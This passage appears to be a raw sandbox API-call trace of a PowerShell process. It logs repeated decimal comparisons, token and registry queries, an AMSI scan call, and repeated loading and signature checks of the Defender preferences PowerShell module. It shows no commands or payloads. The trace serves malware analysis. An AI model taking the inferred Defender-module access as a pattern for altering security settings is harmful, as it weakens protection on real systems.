(pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x0 [0266.637] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.637] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x0 [0266.637] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c3b8, pdecRight=0x1b83c3a8) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.638] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.638] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.638] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.638] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.638] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.638] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.639] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.639] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.639] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.639] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.639] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.639] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.639] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.639] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.639] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.639] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.639] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.639] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.639] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.639] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.639] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.640] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.640] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.640] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.640] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.640] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.642] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x0 [0266.642] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x1 [0266.642] VarDecCmp (pdecLeft=0x1b83c3b8, pdecRight=0x1b83c3a8) returned 0x1 [0266.643] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.643] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.644] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.644] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.644] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.644] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.644] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.644] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.644] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.644] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x0 [0266.644] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.644] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x0 [0266.644] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.644] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x0 [0266.644] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x1 [0266.644] VarDecCmp (pdecLeft=0x1b83c3b8, pdecRight=0x1b83c3a8) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x0 [0266.645] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c3b8, pdecRight=0x1b83c3a8) returned 0x2 [0266.645] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c378, pdecRight=0x1b83c368) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c7a8, pdecRight=0x1b83c798) returned 0x2 [0266.645] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.645] VarDecFix (in: pdecIn=0x1b83c608, pdecResult=0x1b83c590 | out: pdecResult=0x1b83c590) returned 0x0 [0266.645] VarDecCmp (pdecLeft=0x1b83c5f8, pdecRight=0x1b83c5e8) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x2 [0266.645] VarDecFix (in: pdecIn=0x1b83c600, pdecResult=0x1b83c570 | out: pdecResult=0x1b83c570) returned 0x0 [0266.645] VarDecCmp (pdecLeft=0x1b83c5f0, pdecRight=0x1b83c5e0) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c5d0, pdecRight=0x1b83c5c0) returned 0x2 [0266.645] VarDecCmp (pdecLeft=0x1b83c608, pdecRight=0x1b83c5f8) returned 0x2 [0266.645] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c718, pdecRight=0x1b83c708) returned 0x1 [0266.645] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c5e8, pdecRight=0x1b83c5d8) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c5a8, pdecRight=0x1b83c598) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c588, pdecRight=0x1b83c578) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.646] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.646] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.646] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.646] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.646] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.646] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.647] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.647] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.647] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.647] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.647] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.647] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.649] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.649] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.649] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.649] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.649] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.649] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.663] GetCurrentProcess () returned 0xffffffffffffffff [0266.664] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b83b798 | out: TokenHandle=0x1b83b798*=0x7e8) returned 1 [0266.666] CloseHandle (hObject=0x7e8) returned 1 [0266.666] GetCurrentProcess () returned 0xffffffffffffffff [0266.666] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b83b7d8 | out: TokenHandle=0x1b83b7d8*=0x7e8) returned 1 [0266.667] CloseHandle (hObject=0x7e8) returned 1 [0267.918] CoCreateGuid (in: pguid=0x1b83ce58 | out: pguid=0x1b83ce58*(Data1=0xe8fe1950, Data2=0x8bd, Data3=0x46a9, Data4=([0]=0x82, [1]=0x8f, [2]=0xb7, [3]=0xca, [4]=0x32, [5]=0xb, [6]=0xbf, [7]=0x20))) returned 0x0 [0267.953] AmsiScanBuffer () returned 0x80070015 [0268.660] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\EventLog\\ProtectedEventLogging", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83c748 | out: phkResult=0x1b83c748*=0x0) returned 0x2 [0268.660] EtwEventWriteTransfer () returned 0x0 [0268.661] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c060, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0268.834] EtwEventActivityIdControl () returned 0x0 [0268.834] EtwEventActivityIdControl () returned 0x0 [0268.834] EtwEventActivityIdControl () returned 0x0 [0268.835] EtwEventActivityIdControl () returned 0x0 [0270.427] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c180, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0270.466] EtwEventActivityIdControl () returned 0x0 [0270.466] EtwEventActivityIdControl () returned 0x0 [0270.466] EtwEventActivityIdControl () returned 0x0 [0270.505] EtwEventActivityIdControl () returned 0x0 [0270.505] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0x1ed2ea47, Data2=0x9262, Data3=0x4a97, Data4=([0]=0xb0, [1]=0x95, [2]=0x42, [3]=0x17, [4]=0xa6, [5]=0x1e, [6]=0xf8, [7]=0x9f))) returned 0x0 [0270.507] CoCreateGuid (in: pguid=0x1b83c748 | out: pguid=0x1b83c748*(Data1=0xb7b241f1, Data2=0x814a, Data3=0x42ea, Data4=([0]=0x92, [1]=0x1d, [2]=0xa0, [3]=0xbb, [4]=0xdc, [5]=0xcd, [6]=0x84, [7]=0x76))) returned 0x0 [0270.508] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b83c180, nSize=0xf1 | out: lpBuffer="") returned 0x0 [0270.508] EtwEventActivityIdControl () returned 0x0 [0270.508] EtwEventActivityIdControl () returned 0x0 [0270.508] EtwEventActivityIdControl () returned 0x0 [0270.531] EtwEventActivityIdControl () returned 0x0 [0270.626] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml")) returned 0x20 [0270.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0270.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0270.629] CoTaskMemAlloc (cb=0x20c) returned 0x1acf1c90 [0270.629] GetSystemDirectoryW (in: lpBuffer=0x1acf1c90, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0270.629] CoTaskMemFree (pv=0x1acf1c90) [0270.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0270.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0270.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9f8) returned 1 [0270.629] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b83cd20 | out: lpFileInformation=0x1b83cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1e219bd8, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0270.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9a8) returned 1 [0270.630] GetSystemInfo (in: lpSystemInfo=0x1b83cda0 | out: lpSystemInfo=0x1b83cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0270.630] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83cca8 | out: phkResult=0x1b83cca8*=0x5ec) returned 0x0 [0270.630] RegQueryValueExW (in: hKey=0x5ec, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b83ccf8, lpData=0x0, lpcbData=0x1b83ccf0*=0x0 | out: lpType=0x1b83ccf8*=0x0, lpData=0x0, lpcbData=0x1b83ccf0*=0x0) returned 0x2 [0270.631] RegCloseKey (hKey=0x5ec) returned 0x0 [0270.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0270.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0270.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca48) returned 1 [0270.631] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x24763d8 | out: lpFileInformation=0x24763d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992)) returned 1 [0270.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0270.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0270.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0270.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c9c8) returned 1 [0270.633] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83ccf0 | out: lpFileInformation=0x1b83ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992)) returned 1 [0270.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c978) returned 1 [0270.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0270.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0270.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0270.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0270.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83c888) returned 1 [0270.634] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b83cbb0 | out: lpFileInformation=0x1b83cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x7c2e180c, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xf992)) returned 1 [0270.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c838) returned 1 [0270.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0270.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", nBufferLength=0x54, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml", lpFilePart=0x0) returned 0x53 [0270.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83ca88) returned 1 [0270.635] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpPreference.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mppreference.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5ec [0270.635] GetFileType (hFile=0x5ec) returned 0x1 [0270.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83c9f8) returned 1 [0270.635] GetFileType (hFile=0x5ec) returned 0x1 [0270.635] WTGetSignatureInfo () returned 0x0 [0270.682] CertDuplicateCertificateContext (pCertContext=0x1ad09fa0) returned 0x1ad09fa0 [0270.682] CryptCATHandleFromStore () returned 0x81ee00 [0270.682] WTHelperGetProvSignerFromChain () returned 0x817b50 [0270.683] WTHelperGetProvCertFromChain () returned 0x1aa10f20 [0270.684] CertDuplicateCertificateContext (pCertContext=0x1ad08c20) returned 0x1ad08c20 [0270.684] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b83caf8 | out: phkResult=0x1b83caf8*=0x3b8) returned 0x0 [0270.684] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, lpData=0x0, lpcbData=0x1b83cb40*=0x0 | out: lpType=0x1b83cb48*=0x1, lpData=0x0, lpcbData=0x1b83cb40*=0x56) returned 0x0 [0270.684] RegQueryValueExW (in: hKey=0x3b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b83cb48, 